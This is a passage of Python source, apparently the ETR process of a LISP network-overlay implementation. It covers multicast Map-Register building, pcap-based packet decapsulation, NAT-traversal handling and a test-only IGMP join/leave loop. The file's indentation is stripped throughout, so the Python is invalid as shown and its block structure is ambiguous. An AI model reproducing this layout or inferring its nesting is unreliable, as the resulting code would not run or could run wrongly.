lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
return
#enddef
#
# lisp_send_multicast_map_register
#
# Build a Map-Register message with a Multicast Info Type LCAF as an EID-record
# for each entry in the 'entries' array. And build an RLOC-record as an RLE
# describing this ETR as the RLOC to be used for replication.
#
# The entries is an array of (source, group, joinleave) tuples.
#
def lisp_send_multicast_map_register(lisp_sockets, entries):
length = len(entries)
if (length == 0): return
afi = None
if (entries[0][1].find(":") != -1): afi = lisp.LISP_AFI_IPV6
if (entries[0][1].find(".") != -1): afi = lisp.LISP_AFI_IPV4
if (entries[0][1].find("-") != -1): afi = lisp.LISP_AFI_MAC
if (afi == None):
lisp.lprint("lisp_send_multicast_map_register() invalid group address")
return
#endif
#
# Find all (*,G) entries in entries array and replace with (S,G) entries
# from lisp_group_mapping_list. The comment to avoid the source check
# is there so we can build a g_entry that can validate against group
# mappings. Have to fix to allow different sources for the same G when
# (S,G) is reported.
#
g_entries = []
for source, group, joinleave in entries:
# if (source != None): continue
g_entries.append([group, joinleave])
#endfor
decent = lisp.lisp_decent_pull_xtr_configured()
ms_list = {}
entries = []
for group, joinleave in g_entries:
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None):
lisp.lprint("No group-mapping for {}, could be underlay group". \
format(group))
continue
#endif
lisp.lprint("Use group-mapping '{}' {} for group {}".format( \
ms_gm.group_name, ms_gm.group_prefix.print_prefix(), group))
iid = ms_gm.group_prefix.instance_id
ms_name = ms_gm.use_ms_name
rle = ms_gm.rle_address
#
        # To obtain the decent-index for a group address, just use the group
        # address and no source as part of the hash, because an ITR does not
        # know whether (*,G) or (S,G) is registered with the mapping system.
#
key = ms_name
if (decent):
key = lisp.lisp_get_decent_dns_name_from_str(iid, group)
ms_list[key] = [b"", 0]
#endif
if (len(ms_gm.sources) == 0):
entries.append(["0.0.0.0", group, iid, key, rle, joinleave])
continue
#endif
for s in ms_gm.sources:
ms_list[key] = [b"", 0]
entries.append([s, group, iid, key, rle, joinleave])
#endfor
#endfor
length = len(entries)
if (length == 0): return
lisp.lprint("Build Map-Register for {} multicast entries".format(length))
#
# Build RLE node for RLOC-record encoding. If behind a NAT, we need to
# insert a global address as the RLE node address. We will do that in
# the entries for loop.
#
rle_node = lisp.lisp_rle_node()
rle_node.level = 128
translated_rloc = lisp.lisp_get_any_translated_rloc()
rle = lisp.lisp_rle("")
rle.rle_nodes.append(rle_node)
#
# Set up each map-server names so we can decide which EID-prefixes go
# to which map-servers. [0] is eid_records and [1] is count. The ms_list
# is already setup for when pull-based decent is used.
#
if (decent == False):
for ms in list(lisp.lisp_map_servers_list.values()):
ms_list[ms.ms_name] = [b"", 0]
#endfor
#endif
rloc_name = None
if (lisp.lisp_nat_traversal): rloc_name = lisp.lisp_hostname
#
# Count number of RTRs reachable so we know allocation count.
#
rtr_count = 0
for rtr in list(lisp.lisp_rtr_list.values()):
if (rtr == None): continue
rtr_count += 1
#endfor
#
# Run through multicast entry array.
#
eid_records = b""
for source, group, iid, ms_dns_name, rle_addr, joinleave in entries:
#
# Is db entry associated with a map-server name that is not configured?
#
if (ms_dns_name not in ms_list): continue
eid_record = lisp.lisp_eid_record()
eid_record.rloc_count = 1 + rtr_count
eid_record.authoritative = True
eid_record.record_ttl = lisp.LISP_REGISTER_TTL if joinleave else 0
eid_record.eid = lisp.lisp_address(afi, source, 0, iid)
if (eid_record.eid.address == 0): eid_record.eid.mask_len = 0
eid_record.group = lisp.lisp_address(afi, group, 0, iid)
if (eid_record.group.is_mac_broadcast() and \
eid_record.eid.address == 0): eid_record.eid.mask_len = 0
decent_index = ""
ms_name = ""
if (lisp.lisp_decent_pull_xtr_configured()):
decent_index = lisp.lisp_get_decent_index(eid_record.group)
decent_index = lisp.bold(str(decent_index), False)
decent_index = "with decent-index {}".format(decent_index)
else:
decent_index = "for ms-name '{}'".format(ms_dns_name)
#endif
eid_str = lisp.green(eid_record.print_eid_tuple(), False)
lisp.lprint(" EID-prefix {} {}{}".format(eid_str, ms_name,
decent_index))
eid_records += eid_record.encode()
eid_record.print_record(" ", False)
ms_list[ms_dns_name][1] += 1
#
# Build our RLOC entry.
#
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc_name = rloc_name
#
# Decide on RLE address. Have NAT-traversal take precedent, otherwise
# use configured RLE in group-mapping. If one wasn't configured use
# lisp_myrlocs IPv4 address.
#
if (translated_rloc != None):
rle_node.address = translated_rloc
elif (rle_addr != None):
rle_node.address = rle_addr
else:
rle_node.address = rle_addr = lisp.lisp_myrlocs[0]
#endif
rloc_record.rle = rle
rloc_record.local_bit = True
rloc_record.reach_bit = True
rloc_record.priority = 255
rloc_record.weight = 0
rloc_record.mpriority = 1
rloc_record.mweight = 100
eid_records += rloc_record.encode()
rloc_record.print_record(" ")
#
        # If we are doing NAT-traversal, include a set of RTR RLOCs with
# priority 1. And set the global RLOCs to priority 254.
#
for rtr in list(lisp.lisp_rtr_list.values()):
if (rtr == None): continue
rloc_record = lisp.lisp_rloc_record()
rloc_record.rloc.copy_address(rtr)
rloc_record.priority = 254
rloc_record.rloc_name = "RTR"
rloc_record.weight = 0
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.local_bit = False
rloc_record.reach_bit = True
eid_records += rloc_record.encode()
rloc_record.print_record(" RTR ")
#endfor
#
# Add EID-records to correct map-server name set.
#
ms_list[ms_dns_name][0] += eid_records
#endfor
#
# Build map-server independent fields.
#
map_register = lisp.lisp_map_register()
map_register.nonce = 0xaabbccdddfdfdf00
map_register.xtr_id_present = True
map_register.proxy_reply_requested = True
map_register.map_notify_requested = False
map_register.merge_register_requested = True
#
# Send Map-Register to each configured map-server.
#
for ms in list(lisp.lisp_map_servers_list.values()):
key = ms.dns_name if decent else ms.ms_name
#
# Get EID-records from correct map-server name set.
#
if (key not in ms_list): continue
#
# Build map-server specific fields.
#
map_register.record_count = ms_list[key][1]
if (map_register.record_count == 0): continue
map_register.nonce += 1
map_register.alg_id = ms.alg_id
        map_register.key_id = ms.key_id
map_register.xtr_id = ms.xtr_id
map_register.site_id = ms.site_id
map_register.encrypt_bit = (ms.ekey != None)
packet = map_register.encode()
map_register.print_map_register()
#
# Append EID-records and encode xtr-ID and site-ID at end of
# Map-Register.
#
trailer = map_register.encode_xtr_id(b"")
packet = packet + eid_records + trailer
ms.map_registers_multicast_sent += 1
lisp.lisp_send_map_register(lisp_sockets, packet, map_register, ms)
#
# Do DNS lookup for Map-Server if "dns-name" configured.
#
ms.resolve_dns_name()
#
# Go build more EID-records.
#
time.sleep(.001)
#endfor
return
#enddef
#
# lisp_etr_data_plane
#
# Capture a LISP encapsulated packet, decap it, process inner header, and
# re-encapsulate it.
#
def lisp_etr_data_plane(parms, not_used, packet):
global lisp_ipc_listen_socket, lisp_send_sockets
device = parms[0]
lisp_raw_socket = parms[1]
#
    # Jump over the MAC header if the packet was received on an interface
    # (16-byte offset); loopback interfaces only carry a 4-byte internal
    # header.
#
if (lisp.lisp_is_macos() == False):
offset = 4 if device == "lo0" else 16
packet = packet[offset::]
#endif
#
# Check IGMP packet.
#
protocol = struct.unpack("B", packet[9:10])[0]
if (protocol == 2):
entries = lisp.lisp_process_igmp_packet(packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
#
# Check RLOC-probe Map-Request. We need to grab the TTL from IP header.
#
orig_packet = packet
packet, source, port, ttl = lisp.lisp_is_rloc_probe(packet, 0)
if (orig_packet != packet):
if (source == None): return
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port, ttl)
return
#endif
#
# First check if we are assembling IPv4 fragments. Do this only when
# not doing NAT-traversal. Otherwise, the kernel will do it when we
# receive the same packet on a raw socket (in lisp_etr_nat_data_plane()).
#
if (struct.unpack("B", packet[0:1])[0] & 0xf0 == 0x40):
sport = socket.ntohs(struct.unpack("H", packet[20:22])[0])
if (lisp.lisp_nat_traversal and sport == lisp.LISP_DATA_PORT): return
packet = lisp.lisp_reassemble(packet)
if (packet == None): return
#endif
packet = lisp.lisp_packet(packet)
status = packet.decode(True, lisp_ipc_listen_socket, lisp.lisp_decap_stats)
if (status == None): return
#
# Print some useful header fields.
#
packet.print_packet("Receive", True)
#
# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address changes that affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
source = packet.inner_source.print_address_no_iid()
packet.strip_outer_headers()
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply. The inner LISP header begins at offset 20+16+28=64
# (outer-IPv4 + UDP-outer-LISP + inner-IPv4-UDP).
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet[36::]
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0:1])):
ttl = struct.unpack("B", inner_ip[8:9])[0] - 1
#endif
source = packet.outer_source.print_address_no_iid()
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on pcap interface. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Strip outer headers and start inner header forwarding logic.
#
packet.strip_outer_headers()
f_or_b = lisp.bold("Forward", False)
#
# Process inner header (checksum and decrement ttl).
#
igmp = False
L2 = packet.inner_dest.is_mac()
if (L2):
packet.packet = lisp.lisp_mac_input(packet.packet)
if (packet.packet == None): return
f_or_b = lisp.bold("Bridge", False)
elif (packet.inner_version == 4):
igmp, packet.packet = lisp.lisp_ipv4_input(packet.packet)
if (packet.packet == None): return
if (igmp):
entries = lisp.lisp_process_igmp_packet(packet.packet)
if (type(entries) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, entries)
return
#endif
#endif
packet.inner_ttl = packet.outer_ttl
elif (packet.inner_version == 6):
packet.packet = lisp.lisp_ipv6_input(packet)
if (packet.packet == None): return
packet.inner_ttl = packet.outer_ttl
else:
lisp.dprint("Cannot parse inner packet header")
return
#endif
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
return
#endif
else:
if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet (through NAT)")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
#
# We are going to forward or bridge the decapsulated packet.
#
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format(f_or_b, \
lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# If we are decapsulating a MAC frame, then use the L2 socket where
# the MAC header is already in packet.
#
if (L2):
packet.bridge_l2_packet(packet.inner_dest, db)
return
#endif
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header.
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
    # Get the socket based on instance-ID; default to the global raw socket otherwise.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_etr_nat_data_plane
#
# Packet came in on a destination ephemeral port from a source port of 4341.
# That is, an RTR encapsulated this packet and it is coming through a NAT device.
#
# The packet has the outer IP and UDP headers stripped so the first byte of
# this supplied data packet has the LISP data header on it.
#
def lisp_etr_nat_data_plane(lisp_raw_socket, packet, source):
global lisp_ipc_listen_socket, lisp_send_sockets
#
# Decode LISP header.
#
lisp_header = packet
packet = lisp.lisp_packet(packet[8::])
if (packet.lisp_header.decode(lisp_header) == False): return
#
# Store outer source RLOC address so if we are doing lisp-crypto across
# NAT-traversal, we can find the decryption key.
#
packet.outer_source = lisp.lisp_address(lisp.LISP_AFI_IPV4, source,
lisp.LISP_IPV4_HOST_MASK_LEN, 0)
status = packet.decode(False, lisp_ipc_listen_socket,
lisp.lisp_decap_stats)
if (status == None): return
#
# Special case to log packets with no outer header but are considered
# decapsulated when coming through NATs. Since packets are sent from
# source port 4341, the kernel will strip outer header, so we don't have
# outer header context in lisp_packet().
#
if (lisp.lisp_flow_logging): packet.log_flow(False)
packet.print_packet("Kernel-decap", False)
lisp.dprint(packet.lisp_header.print_header(" "))
#
# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address changes that affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
sport = packet.udp_sport
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply.
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0:1])):
ttl = struct.unpack("B", inner_ip[8:9])[0] - 1
#endif
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on ephemeral socket. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
#endif
#endif
else:
if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format( \
lisp.bold("NAT-Forward", False), lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
    # Default to global raw socket, otherwise get socket based on instance-ID.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out on raw socket.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_register_ipv6_group_entries
#
# Find an IPv6 group-mapping and send a Map-Register for each configured IPv6
# source for the IPv6 group-prefix found.
#
def lisp_register_ipv6_group_entries(group, joinleave):
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None): return
sg = []
for s in ms_gm.sources:
sg.append([s, group, joinleave])
#endfor
lisp_send_multicast_map_register(lisp_send_sockets, sg)
return
#enddef
#
# lisp_etr_join_leave_process
#
# Look at file-system to see if there is a join or leave to be done. This
# function will send joins in the form of building an IP/IGMPv2 packet to
# be passed to lisp_process_igmp_packet(). The groups that are joined are
# ones found as filenames in the current directory as "join-<group>". The
# IGMP Reports will be sent to lisp_process_igmp_packet() every 30 seconds.
#
# For right now, if the group address is IPv6, send a Map-Register directly.
# We will get to MLD support later.
#
# This is used for testing and not meant for production deployment.
#
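# For example (illustrative only), creating an empty file in the current
# directory triggers a join for that group:
#
#   touch join-224.1.1.10
#
# and creating the matching "leave-<group>" file turns it into a leave:
#
#   touch leave-224.1.1.10
#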
def lisp_etr_join_leave_process():
global lisp_send_sockets
lisp.lisp_set_exception()
swap = socket.htonl
ipigmp = [swap(0x46000020), swap(0x9fe60000), swap(0x0102d7cc),
swap(0x0acfc15a), swap(0xe00000fb), swap(0x94040000)]
packet = b""
for l in ipigmp: packet += struct.pack("I", l)
#
# Look for files in current directory for "join-<group>" and then send
# an IGMPv2 report to ourselves.
#
while (True):
groups = getoutput("ls join-*").replace("join-", "")
groups = groups.split("\n")
for group in groups:
if (lisp.lisp_valid_address_format("address", group) == False):
continue
#endif
ipv6 = (group.find(":") != -1)
#
# Check if we are leaving group.
#
leavejoin = os.path.exists("leave-{}".format(group))
lisp.lprint("Internal {} group {}".format( \
"leaving" if leavejoin else "joining", group))
#
# Set IGMP message to Report or Leave. Then add group.
#
if (ipv6):
if (group.lower().find("ff02:") != -1):
lisp.lprint("Suppress registration for link-local groups")
continue
#endif
lisp_register_ipv6_group_entries(group, (leavejoin == False))
else:
send_packet = packet
if (leavejoin):
send_packet += struct.pack("I", swap(0x17000000))
else:
send_packet += struct.pack("I", swap(0x16000000))
#endif
octet = group.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
send_packet += struct.pack("I", swap(value))
sg = lisp.lisp_process_igmp_packet(send_packet)
if (type(sg) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, sg)
#endif
time.sleep(.100)
#endif
#endfor
time.sleep(10)
#endwhile
return
#enddef
#
# lisp_etr_process
#
# This thread is for receiving encapsulated LISP packets addressed to destination
# port 4341, as well as IGMP reports. The IGMP reports can be captured on
# Ubuntu and Fedora but not on MacOS. The former supports IGMPv3 and the
# latter supports IGMPv2 if we listen on "en0".
#
def lisp_etr_process():
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
#
# Find all multicast RLEs so we can receive packets on underlay multicast
# groups.
#
rles = lisp.lisp_get_all_multicast_rles()
#
# We need to listen on en0 when doing IGMP testing on MacOS.
#
device = "any"
# device = "en0" if lisp.lisp_is_macos() else "any"
# device = "lo0" if lisp.lisp_is_macos() else "any"
pfilter = "(proto 2) or "
pfilter += "((dst host "
for addr in lisp.lisp_get_all_addresses() + rles:
pfilter += "{} or ".format(addr)
    #endfor
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
pfilter += "(udp src port 4341) or "
pfilter += "(udp dst port 4342 and ip[28] == 0x12) or "
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
lisp.lprint("Capturing packets for: '{}' on device {}".format(pfilter,
device))
#
# Enter receive loop.
#
if (lisp.lisp_is_python2()):
import pcappy
pcap = pcappy.open_live(device, 1600, 0, 100)
pcap.filter = pfilter
pcap.loop(-1, lisp_etr_data_plane, [device, lisp_raw_socket])
#endif
if (lisp.lisp_is_python3()):
import pcapy
pcap = pcapy.open_live(device, 1600, 0, 100)
pcap.setfilter(pfilter)
while(True):
header, packet = pcap.next()
lisp_etr_data_plane([device, lisp_raw_socket], None, packet)
#endwhile
#endif
return
#enddef
#
# lisp_etr_startup
#
# Initialize this LISP ETR process. This function returns no values.
#
def lisp_etr_startup():
global lisp_ipc_listen_socket
global lisp_ephem_socket
global lisp_send_sockets
global lisp_raw_socket
global lisp_l2_socket
global lisp_mac_header
lisp.lisp_i_am("etr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("ETR starting up")
#
# Get local address for source RLOC for encapsulation.
#
lisp.lisp_get_local_interfaces()
lisp.lisp_get_local_macs()
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Prebuild MAC header for lisp_l2_socket sending. Disabled code in favor
# of using pytun. See below.
#
# m = list(lisp.lisp_mymacs.keys())[0]
# mac = ""
# for i in range(0, 12, 2): mac += chr(int(m[i:i+2], 16))
# lisp_mac_header = mac + mac + "\x86\xdd"
# lisp.dprint("Built MAC header for L2 socket:",
# lisp.lisp_format_packet(lisp_mac_header))
#
    # Used for listening for Info-Replies for NAT-traversal support.
#
s = lisp.lisp_open_listen_socket("0.0.0.0", str(lisp_ephem_port))
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
lisp_ephem_socket = s
#
# Open network send socket and internal listen socket.
#
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-etr")
lisp_send_sockets[0] = lisp_ephem_socket
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
    # ETRs as well. All other components use an array size of 3.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
lisp_send_sockets.append(lisp_raw_socket)
#
# Open a L2 socket so when we decapsulate and have to route an IPv6
# packet, we have the kernel receive a MAC frame on the loopback interface.
# We do this because there is no IP_HDRINCL for IPv6 raw sockets.
#
# Disabling this code in favor of using a tuntap tun interface via the
# pytun module. See code right below.
#
# if ("PF_PACKET" in dir(socket)):
# interface = "lo" if ("lo" in lisp.lisp_myinterfaces.keys()) else \
# "lo0" if ("lo0" in lisp.lisp_myinterfaces.keys()) else None
# if (interface != None):
# lisp_l2_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
# lisp_l2_socket.bind(("lo", 0x86dd))
# #endif
# #endif
#
# Setup tuntap tunnel interface so when we decap IPv6 packets, we can
# send to kernel to route them.
#
if (pytun != None):
lisp_mac_header = b'\x00\x00\x86\xdd'
device = "lispers.net"
try:
lisp_l2_socket = pytun.TunTapDevice(flags=pytun.IFF_TUN,
name=device)
os.system("ip link set dev {} up".format(device))
except:
lisp.lprint("Cannot create tuntap interface")
#endtry
#endif
#
# Start thread to listen on data socket.
#
threading.Thread(target=lisp_etr_process, args=[]).start()
#
# Test code to force IGMPv2 joins and leaves on an airplane. ;-)
#
threading.Thread(target=lisp_etr_join_leave_process, args=[]).start()
return(True)
#enddef
#
# lisp_etr_shutdown
#
# Shut down this process.
#
def lisp_etr_shutdown():
global lisp_register_timer
global lisp_etr_info_timer
#
# Cancel periodic Map-Register and Info timer threads.
#
if (lisp_register_timer): lisp_register_timer.cancel()
if (lisp_etr_info_timer): lisp_etr_info_timer.cancel()
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_etr_discover_eid
#
# Process IPC message from the lisp-itr process. It will be in the form of:
#
# "learn%<eid-string>%<interface-name>"
#
def lisp_etr_discover_eid(ipc):
ipc = ipc.split("%")
eid_str = ipc[1]
interface = ipc[2]
if (interface == "None"): interface = None
eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
eid.store_address(eid_str)
#
# Do database-mapping lookup.
#
db = lisp.lisp_db_for_lookups.lookup_cache(eid, False)
if (db == None or db.dynamic_eid_configured() == False):
lisp.lprint("ITR/ETR dynamic-EID configuration out of sync for {}". \
format(lisp.green(eid_str, False)))
return
#endif
#
# Do logic checks. That is do not remove an entry if it is not there and
# don't try to add an entry if it is already cached.
#
dyn_eid = None
if (eid_str in db.dynamic_eids): dyn_eid = db.dynamic_eids[eid_str]
if (dyn_eid == None and interface == None):
lisp.lprint("ITR/ETR state mismatch for {}".format( \
lisp.green(eid_str, False)))
return
#endif
#
# Check if ITR is changing the interface to the same interface, meaning
# it is confused. Otherwise, the IPC is an interface change. Don't register
# in this case.
#
if (dyn_eid and interface):
if (dyn_eid.interface == interface):
lisp.lprint("ITR sent redundant IPC for {}".format( \
lisp.green(eid_str, False)))
else:
lisp.lprint("Dynamic-EID {} interface change, {} -> {}".format( \
lisp.green(eid_str, False), dyn_eid.interface, interface))
dyn_eid.interface = interface
#endif
return
#endif
#
# Add new entry and register it.
#
if (interface):
dyn_eid = lisp.lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = interface
dyn_eid.get_timeout(interface)
db.dynamic_eids[eid_str] = dyn_eid
reg = lisp.bold("Registering", False)
eid_str = lisp.bold(eid_str, False)
lisp.lprint("{} dynamic-EID {} on interface {}, timeout {}".format(reg,
lisp.green(eid_str, False), interface, dyn_eid.timeout))
lisp_build_map_register(lisp_send_sockets, None, eid, None, False)
#
# Add /32 to routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route add {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
return
#endif
#
    # Remove existing entry and deregister it.
#
if (eid_str in db.dynamic_eids):
interface = db.dynamic_eids[eid_str].interface
dereg = lisp.bold("Deregistering", False)
lisp.lprint("{} dynamic-EID {}".format(dereg,
lisp.green(eid_str, False)))
lisp_build_map_register(lisp_send_sockets, 0, eid, None, False)
db.dynamic_eids.pop(eid_str)
#
# Delete /32 from routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route delete {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
#endif
return
#enddef
#
# lisp_etr_process_rtr_updown
#
# Process IPC message from lisp-itr. It tells the lisp-etr process whether
# RLOC-probing has determined that the RTR has gone up or down, and therefore
# whether the RTR should be registered to the mapping system.
#
def lisp_etr_process_rtr_updown(ipc):
if (lisp.lisp_register_all_rtrs): return
opcode, rtr_str, status = ipc.split("%")
if (rtr_str not in lisp.lisp_rtr_list): return
lisp.lprint("Process ITR IPC message, RTR {} has gone {}".format(
lisp.red(rtr_str, False), lisp.bold(status, False)))
rtr = lisp.lisp_rtr_list[rtr_str]
if (status == "down"):
lisp.lisp_rtr_list[rtr_str] = None
return
#endif
rtr = lisp.lisp_address(lisp.LISP_AFI_IPV4, rtr_str, 32, 0)
lisp.lisp_rtr_list[rtr_str] = rtr
return
#enddef
#
# lisp_etr_process_nonce_ipc
#
# Process a nonce IPC message from the ITR. It wants to know when a nonce
# is echoed from a remote ITR.
#
def lisp_etr_process_nonce_ipc(ipc):
x, opcode, rloc_str, nonce = ipc.split("%")
nonce = int(nonce, 16)
echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)
if (opcode == "R"):
echo_nonce.request_nonce_sent = nonce
lisp.lprint("Waiting for echo-nonce 0x{} from {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
elif (opcode == "E"):
echo_nonce.echo_nonce_sent = nonce
lisp.lprint("Sent echo-nonce 0x{} to {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
#endif
return
#enddef
#
# ETR commands processed by this process.
#
lisp_etr_commands = {
"lisp xtr-parameters" : [lispconfig.lisp_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
